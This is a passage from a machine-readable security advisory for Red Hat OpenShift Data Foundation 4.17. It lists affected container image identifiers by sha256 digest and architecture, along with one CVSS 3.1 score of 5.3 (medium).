"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
